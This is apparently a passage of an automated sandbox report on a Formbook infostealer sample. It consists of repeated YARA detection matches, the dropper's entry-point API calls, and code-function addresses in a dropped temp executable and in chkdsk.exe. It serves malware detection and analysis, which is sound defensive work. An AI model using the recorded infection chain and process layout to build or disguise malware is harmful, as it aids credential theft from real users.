          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: inlaww321345.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B18901_2_003B1890
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B9C121_2_003B9C12
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B96A01_2_003B96A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003B7E881_2_003B7E88
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003BC3BD1_2_003BC3BD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003BA1841_2_003BA184
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 1_2_003BB3F11_2_003BB3F1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B9C122_2_003B9C12
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B96A02_2_003B96A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B18902_2_003B1890
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003B7E882_2_003B7E88
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003BC3BD2_2_003BC3BD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003BA1842_2_003BA184
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_003BB3F12_2_003BB3F1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041D8052_2_0041D805
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041DA332_2_0041DA33
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041EB322_2_0041EB32
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041C3EA2_2_0041C3EA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041ED642_2_0041ED64
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0041DD0A2_2_0041DD0A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409E5E2_2_00409E5E
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016841202_2_01684120
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0166F9002_2_0166F900
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016899BF2_2_016899BF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173E8242_2_0173E824
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A8302_2_0168A830
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017210022_2_01721002
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017328EC2_2_017328EC
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016920A02_2_016920A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017320A82_2_017320A8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167B0902_2_0167B090
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168AB402_2_0168AB40
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0170CB4F2_2_0170CB4F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01732B282_2_01732B28
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168A3092_2_0168A309
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017123E32_2_017123E3
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172DBD22_2_0172DBD2
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017203DA2_2_017203DA
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169ABD82_2_0169ABD8
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169EBB02_2_0169EBB0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0169138B2_2_0169138B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0171FA2B2_2_0171FA2B
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01724AEF2_2_01724AEF
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017322AE2_2_017322AE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731D552_2_01731D55
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01660D202_2_01660D20
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01732D072_2_01732D07
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167D5E02_2_0167D5E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017325DD2_2_017325DD
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_016925812_2_01692581
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01722D822_2_01722D82
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172D4662_2_0172D466
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0168B4772_2_0168B477
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0167841F2_2_0167841F
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_017244962_2_01724496
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01731FF12_2_01731FF1
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0173DFCE2_2_0173DFCE
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01686E302_2_01686E30
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_0172D6162_2_0172D616
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: 2_2_01732EF72_2_01732EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053B0D2016_2_053B0D20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05481D5516_2_05481D55
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05482D0716_2_05482D07
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054825DD16_2_054825DD
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E258116_2_053E2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CD5E016_2_053CD5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547D46616_2_0547D466
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053C841F16_2_053C841F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548DFCE16_2_0548DFCE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05481FF116_2_05481FF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D6E3016_2_053D6E30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547D61616_2_0547D616
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05482EF716_2_05482EF7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053D412016_2_053D4120
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053BF90016_2_053BF900
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547100216_2_05471002
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0548E82416_2_0548E824
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053E20A016_2_053E20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054828EC16_2_054828EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053CB09016_2_053CB090
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054820A816_2_054820A8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_05482B2816_2_05482B28
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053DAB4016_2_053DAB40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053EEBB016_2_053EEBB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0547DBD216_2_0547DBD2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054703DA16_2_054703DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0546FA2B16_2_0546FA2B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_054822AE16_2_054822AE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098D80516_2_0098D805
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098DA3316_2_0098DA33
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098C3EA16_2_0098C3EA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098EB3216_2_0098EB32
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00972D9016_2_00972D90
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00972D8716_2_00972D87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098DD0A16_2_0098DD0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098ED6416_2_0098ED64
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00979E5E16_2_00979E5E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00979E6016_2_00979E60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00972FB016_2_00972FB0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 053BB150 appears 48 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exeCode function: String function: 003B4599 appears 38 times
